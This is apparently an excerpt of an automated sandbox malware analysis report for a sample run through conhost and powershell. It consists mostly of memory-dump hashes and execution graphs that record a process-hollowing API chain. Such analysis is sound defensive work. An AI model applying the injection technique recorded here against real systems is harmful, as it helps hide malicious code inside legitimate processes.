                                          • Instruction ID: 75439e8957bbc43faff20e38fab3ef42ee9943a25630bac1ce0a0ee62b1501f1
                                          • Opcode Fuzzy Hash: 29c997cca77a151d10f80b51c4b0b8b0ef586ee699da17bcdf684d3d17d16794
                                          • Instruction Fuzzy Hash: 87518F3184E6C25FE317D77498A2B547FA0AE03164B2E02EAC0D4CB1E7DA9DA456C772
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph rendering omitted; basic blocks 7ff9f1c311eb through 7ff9f1c31282, no calls]
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b468943b3a0f49afc29392a2d7477022e603b6143ba651b053ee91d41ae1c1f
                                          • Instruction ID: 8e8015699555361a36d1000279b71bc71c6284741aa3038115abdf9c37fced8e
                                          • Opcode Fuzzy Hash: 7b468943b3a0f49afc29392a2d7477022e603b6143ba651b053ee91d41ae1c1f
                                          • Instruction Fuzzy Hash: 6611273292CA490EDB69B36C90126FA76D1FF56300F04417EE05EC36D3DE59A8054281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Control-flow graph rendering omitted; basic blocks 7ff9f1c311f0 through 7ff9f1c31282, no calls]
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23ba4a2b1b254c8c7429c51e16c3ecd6301efec50ae1ae47abf84ad7c0e88b5b
                                          • Instruction ID: 658d4c3ab26d42639e8e04c9f6cff70a711b8f7ed2dc308e33750ab35fb642a9
                                          • Opcode Fuzzy Hash: 23ba4a2b1b254c8c7429c51e16c3ecd6301efec50ae1ae47abf84ad7c0e88b5b
                                          • Instruction Fuzzy Hash: CE112931A2CA490ADB69B32C9016AFA73D0FF56310F44457DE05EC36E3EE59B8064285
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.521345881.00007FF9F1C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ff9f1c30000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 872e3fe023c6b912e6abb1e2cf06376fcb4c5813ca158bfa35fcc464dca00da1
                                          • Instruction ID: b239f384f4fe21392baeb6fc5e6c2ff126f107e5d9a028d8bdaa99e9d623b555
                                          • Opcode Fuzzy Hash: 872e3fe023c6b912e6abb1e2cf06376fcb4c5813ca158bfa35fcc464dca00da1
                                          • Instruction Fuzzy Hash: 0DE04F21B1CC1D4F9B94F73D5445FA962D3EB9C210B6645B6E40DC3296DD28DC818790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6531b67ce70f4808bba5184535e8a35845fbd4cc4a06e56e41443b3282772b6
                                          • Instruction ID: 149160ede7069e84d42234b62b4c6182055ebea41e29981a26d0462dda730aab
                                          • Opcode Fuzzy Hash: d6531b67ce70f4808bba5184535e8a35845fbd4cc4a06e56e41443b3282772b6
                                          • Instruction Fuzzy Hash: 9CE18131A1DE558BEB6CDF298C897A973D1FB54310F54412DDA8EC7281EB34F8428785
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                          • Instruction ID: ae84d8aa5c729f26321395add3dfde4062d6c93bca9db02d4e20ee82bb6e0d62
                                          • Opcode Fuzzy Hash: f3e321b4785e06cfc76593c4065e2a267ad969067c31a882a516f8b4e134ab4b
                                          • Instruction Fuzzy Hash: 25A11E31508A4C8FDB59EF28C889BEA77E5FBA8315F10466EE44ED7160EB30E645CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.514767392.000002779DCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002779DCB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_2779dcb0000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                          • Instruction ID: 39eac9059a1fb314aa348241d08906318bdbd3e20e81c5ecbe604d1085ae4ea1
                                          • Opcode Fuzzy Hash: b9024142b0f504c64395661c2abff4caccef44dbafbcbe07c4f80d19b33edefa
                                          • Instruction Fuzzy Hash: 1181613161DB498BEB68DF2598997EAB7E4FB58301F00462ED99FC2141DF30E9458BC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @ N
                                          • API String ID: 0-1596310659
                                          • Opcode ID: b400e364327ff5ef20cbc0a5beb896dda7498147f9751466d594c1b09071aee9
                                          • Instruction ID: 2f6812d53aaa8e9806a44af1e8dff30e182016dd7aed2043b774850a938d21d1
                                          • Opcode Fuzzy Hash: b400e364327ff5ef20cbc0a5beb896dda7498147f9751466d594c1b09071aee9
                                          • Instruction Fuzzy Hash: B0916832A0CA8A4FE79AD71C58556B57BD2EFA6320F2801BED05DC71D3DE58AC858381
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 965c067d92001e5efb35c23ec11c1e99555fb23eed8e3658406437b115e1152c
                                          • Instruction ID: e5e13278fc900ddb03aed40f8c0d1dcd989e0dfa99023db176f2df6c25f7e4ab
                                          • Opcode Fuzzy Hash: 965c067d92001e5efb35c23ec11c1e99555fb23eed8e3658406437b115e1152c
                                          • Instruction Fuzzy Hash: 1E02C030A08A498FDF85EF2CC495AA97BE1FF59311F54416AD40DD729ACB65F882CBC0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 782ffa434146e8a01ecbcdcd1e419b9adcae5fc0863c9067df396e8d34547bec
                                          • Instruction ID: 4eb2b67abe35538625a172f04d1162596a24ba550c11e6c4409bf33609c08bb0
                                          • Opcode Fuzzy Hash: 782ffa434146e8a01ecbcdcd1e419b9adcae5fc0863c9067df396e8d34547bec
                                          • Instruction Fuzzy Hash: E8F1C230A08A498FDB94EF1DC485AA97BE1FF69301F5441A9D40DD729ACB75F882CBC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50e0daed9258fdcfb451b667d837cd69f4fb09419139e85ab7a75439d5842a92
                                          • Instruction ID: 9b63db62618b0f9e862973679ed392a2083b92d061cc6b5a8ce8b3431cc28cbb
                                          • Opcode Fuzzy Hash: 50e0daed9258fdcfb451b667d837cd69f4fb09419139e85ab7a75439d5842a92
                                          • Instruction Fuzzy Hash: 36A1487290CB894FE755EB299C156B63BE0FF56320F1801BEE05DC71D3EA28AC568391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd804891815f9e8652ea4e84ee21e9ec57271a4754215a04ece0634d95cfc643
                                          • Instruction ID: e42a12f0efe08745b4bac41b8e24f764ff8e539ab54ec4db06ae5dd0c1dc48c0
                                          • Opcode Fuzzy Hash: bd804891815f9e8652ea4e84ee21e9ec57271a4754215a04ece0634d95cfc643
                                          • Instruction Fuzzy Hash: 6D11707180E7C58FD7478B344C695957FB0EF23211B4902DBD594CB0F7D6585848C7A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 755b47dbec1437449d5a82276d3b788f08c2fb24fcc41ee4ec4265828a436f2a
                                          • Instruction ID: b7dbda2434e35a45ed2a434836e4c155f96c1b592d8606806d30b99036927ce5
                                          • Opcode Fuzzy Hash: 755b47dbec1437449d5a82276d3b788f08c2fb24fcc41ee4ec4265828a436f2a
                                          • Instruction Fuzzy Hash: 9B51083190CA498FD305DB18D454BA5B7E1FF85310F4846BAE05CC72DECF69A98587C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b8f22fd9a831c898ccdccc9194af5c5460e7ecda4dc4ce41252cf3da7e16ced2
                                          • Instruction ID: 52e50c52a610a75a06dcbd30b201c2df68cfc402d23af33677b2378dd884bc13
                                          • Opcode Fuzzy Hash: b8f22fd9a831c898ccdccc9194af5c5460e7ecda4dc4ce41252cf3da7e16ced2
                                          • Instruction Fuzzy Hash: 64411332A0CA894FEBAAD72854517B87BD1EFA5720B6801FEC05EC71D3DA58BC4583C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd71693f573ee411f383d1db9fe8fe40a5aa4aa9b38d498d48c624bf98871c20
                                          • Instruction ID: 4084420a8075ac54c9e66829c07ba429a37e4ef945c93872c44daefbc359e209
                                          • Opcode Fuzzy Hash: dd71693f573ee411f383d1db9fe8fe40a5aa4aa9b38d498d48c624bf98871c20
                                          • Instruction Fuzzy Hash: FB31F87191CB888FDB58DF5C98066A97BE0FB59321F04426FE049C3292DB74A855CBC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d9e5840abae7962780ad1d1f32c7da210ab13cbbde0cad300b76486c6a06ea79
                                          • Instruction ID: d68e4a0493d73dc62b66327ce6835abd084e0a9dd38cdf6a3fdde7ae1b1f30e6
                                          • Opcode Fuzzy Hash: d9e5840abae7962780ad1d1f32c7da210ab13cbbde0cad300b76486c6a06ea79
                                          • Instruction Fuzzy Hash: 1121283090CB4C8FDB59DFAC984A7E97FE0EB56321F04416BD049C3156CB74A85ACB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 840b53a5d30fc9e8d0ec5778ad601eb57f95a1d5abf06124cafdb02c9a2fbffe
                                          • Instruction ID: c7304689334e9d28fea5c358bbb84262860e7a934c8c923b0b596d973a2a6b0a
                                          • Opcode Fuzzy Hash: 840b53a5d30fc9e8d0ec5778ad601eb57f95a1d5abf06124cafdb02c9a2fbffe
                                          • Instruction Fuzzy Hash: 1821DD22E0DA864FE7AADB58545137476D2EFB5310B7900B9C12EC72E3CE68F8848281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481946474.00007FF9F1C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1c20000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c78d59ab3a856f88c157e3b22803e6228723f2f94a5adfe0a2efe1e5ab821201
                                          • Instruction ID: 6d85f394c98c648894fd63e015c6496d159414e91b0aaecf601e59530e0f85ae
                                          • Opcode Fuzzy Hash: c78d59ab3a856f88c157e3b22803e6228723f2f94a5adfe0a2efe1e5ab821201
                                          • Instruction Fuzzy Hash: C111A032A0DA854FE7A6D71894517B87AD1EF65B20B6800BAD15ECB1D3CB48BC8042C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57c8e95e389048294af7b3b9936d9240bcb4c431421e216c408a86abe748e8e1
                                          • Instruction ID: 1d8270637d8a766f7110ea9933c5dbfb1604d4f466b05db25b899dd04119b816
                                          • Opcode Fuzzy Hash: 57c8e95e389048294af7b3b9936d9240bcb4c431421e216c408a86abe748e8e1
                                          • Instruction Fuzzy Hash: 4301447111CB088FD744EF0CE451AA6B7E0FB95364F50056EE58AC3695DB26E881CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.481457964.00007FF9F1B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ff9f1b50000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 179a3c5a051657039cb3bfbee0abf2169113c517a1e4a41c736b13b1c326416a
                                          • Instruction ID: a1adff5caa1fd5a81f0d5921c16a87657c7a61e12282c7b5100bf742bb9caa74
                                          • Opcode Fuzzy Hash: 179a3c5a051657039cb3bfbee0abf2169113c517a1e4a41c736b13b1c326416a
                                          • Instruction Fuzzy Hash: 2EF0373276C6044FDB4CAA1CF4529B573D1EB99321B44056EE48BC2696D917F8428685
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

Execution Coverage: 16.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 41
Total number of Limit Nodes: 3
execution_graph: raw node/edge listing omitted. Nodes that reach an API call, as listed in the graph: 27e764f9106 (LoadLibraryA, directly and via 27e764f82a2/27e764f82af and 27e764f83ba), 27e764f8eb2 (CLRCreateInstance, SafeArrayDestroy), 7ff9f1c064d0 (CreateProcessA), 7ff9f1c0690e (NtUnmapViewOfSection), 7ff9f1c06b00 (WriteProcessMemory), 7ff9f1c06c00 (SetThreadContext), 7ff9f1c070d0 (ResumeThread), 7ff9f1c071bc (FindCloseChangeNotification).

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction ID: dda2a228d0c9bdcddd1b6a8184d5f843b5aaf9ac11b3f5126b1e35dc133a2f0a
                                          • Opcode Fuzzy Hash: 4981fcbef524a62066d347c258a4edd11de724e6c9263cf9e55c3275a19a809e
                                          • Instruction Fuzzy Hash: B5C1A87031C9059BEF5DDA28C88A7F9F3D5FB9C306F1901A9D45EC7186EB21DC428A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: SectionUnmapView
                                          • String ID:
                                          • API String ID: 498011366-0
                                          • Opcode ID: 7b4211be23b94be085fd443075647a4a5d8041b86a00cf7a3089ba44f9935114
                                          • Instruction ID: 105ee5b77823cc2b2da622d751e31f9d7331737060f5e411ccf0f00ce503e4e6
                                          • Opcode Fuzzy Hash: 7b4211be23b94be085fd443075647a4a5d8041b86a00cf7a3089ba44f9935114
                                          • Instruction Fuzzy Hash: 8931E53090C7888FDB5ADF68C8457E97FE0EF57320F18429FD089C7196D665A846CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: ArrayCreateDestroyInstanceSafe
                                          • String ID:
                                          • API String ID: 3902440814-0
                                          • Opcode ID: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction ID: 2b8d971abc063ef6174d84a50fae2cd1c09a1950e01f462cef93f86a717d4b1e
                                          • Opcode Fuzzy Hash: 3d7ce29a3494d90a8d6d00d3dac55982f43ec50322358874c395b9073376e0d7
                                          • Instruction Fuzzy Hash: 91817030208A088FDB68EF28C889BE6B7E1FF99305F044A6DD49FC7151EB31E9458B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 12e3a04df9cc3d0d8b13f147fad88ed055a4f75051d413c91700522ba2e4678e
                                          • Instruction ID: dc1d256dd028ba9dfa1d24603e784b97b424b33ef3aa498ef827442acc1b824b
                                          • Opcode Fuzzy Hash: 12e3a04df9cc3d0d8b13f147fad88ed055a4f75051d413c91700522ba2e4678e
                                          • Instruction Fuzzy Hash: 9BC1C670918A8D8FEB68DF2CDC467E977D0FB59310F10422AE85DC7291DB74A9858BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: 87045bbf9e9fd6d5d475c4d3ccd640ff1d4fc1fa48d0b94c592fd7e48bcfadd7
                                          • Instruction ID: fbc01e9ed564a61c5281e6f85370e036a546955d5ee3369f1ae0bfbf5e160e17
                                          • Opcode Fuzzy Hash: 87045bbf9e9fd6d5d475c4d3ccd640ff1d4fc1fa48d0b94c592fd7e48bcfadd7
                                          • Instruction Fuzzy Hash: F531E531A0C6088FEB58DF58D8467F9BBE0EB96321F14416FD08DC3192DA75A8968B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 5a2d08dbff7811b729ba0c80f514e8b0c63b8f74a41db581e85ac411c8bd8c5f
                                          • Instruction ID: b92cdae1b0cca36e979e70d58ae5ebd81684e4ba594853d6a336e88e7a0630f1
                                          • Opcode Fuzzy Hash: 5a2d08dbff7811b729ba0c80f514e8b0c63b8f74a41db581e85ac411c8bd8c5f
                                          • Instruction Fuzzy Hash: 0B31E37190CA5C8FDB19DF5C98497F9BBE0FB5A321F04426FD089D3692CB70A8468B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction ID: e91b55f4628f942c9ed6ae405c7a2da772ad12f531f8131a94b7744fe6478b98
                                          • Opcode Fuzzy Hash: f89ad9e96b35fafe6bd70e564392d15cd00fb15afb359a287abc9c565ef81a9a
                                          • Instruction Fuzzy Hash: 3531963130CA084FEF58AA68DC4A2AAB3E5F7D8311F051159EC4FD7286EE64DD4687D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: ca399a048fafa4a4e59a9e056c4343ff41f843a3effc1775aeb189256371beff
                                          • Instruction ID: 93d0d6bf854d753775d0b06c469868742aef5ae4aa36a83799c8f8f9b1fcc4cd
                                          • Opcode Fuzzy Hash: ca399a048fafa4a4e59a9e056c4343ff41f843a3effc1775aeb189256371beff
                                          • Instruction Fuzzy Hash: 4331CF3190CA488FDB59EB68D8067F97BE0EF56320F08416ED04DC36A2CB646856CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction ID: 5b9fe5af969d421a32c70b163cff9df11e52906cee555d4729d001c0779ad6e1
                                          • Opcode Fuzzy Hash: f58acd79c9a8aa4a66f57679936c769f9dd2a38ea99c88ea39cd659f90fbd764
                                          • Instruction Fuzzy Hash: DB31A13130CA184FDF58EA58984A3A9B3D2F7D8721F050299DC0FE72C9EE61DD428792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 1010de40233fd454aa96faf2e0694d4c251615cbab1514dd018ea45a15c87557
                                          • Instruction ID: 96166ba77e5b9937be173a704efe719e1d73f6a85de794027329d239fb2410af
                                          • Opcode Fuzzy Hash: 1010de40233fd454aa96faf2e0694d4c251615cbab1514dd018ea45a15c87557
                                          • Instruction Fuzzy Hash: 8131C23090CA4C9FDB59DB688805BF9BBF0FB56321F14426FD089D31A2DB64A856CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction ID: 055e23c8c5ef004067ebd5881b4ad1a4509a11b98612a180a6ff22238d26ca30
                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction Fuzzy Hash: BAE0D83120CA0D1FFB58D69DD84A7F6A6D8E799276F04006EE549D2141F156989103A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:33.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:15
                                          Total number of Limit Nodes:0
                                          Execution graph (15 nodes): roots 401ce2 and 401bea; 401ce2 -> 401d2a -> 4010c4 (_get_pgmptr) -> 401d63; 401bea -> 401c1c -> 401b3f -> 401b75 -> 4010c4 -> 4010e7 -> 401d80 (_get_pgmptr) -> 40857c, returning through 40114a -> 401bae -> 401cd5.

                                          Control-flow Graph

                                          C-Code - Quality: 37%
                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                          				void* _v32;
                                          				char _v136;
                                          				void* _v144;
                                          				char _v152;
                                          				char _v160;
                                          				char _v680;
                                          				void* _v1200;
                                          				void* _v1208;
                                          				char _v1468;
                                          				long long _v1480;
                                          				long long _v1496;
                                          				long long _v1504;
                                          				long long _v1512;
                                          				long long _v1520;
                                          				long long _v1528;
                                          				long long _v1536;
                                          				long long _v1544;
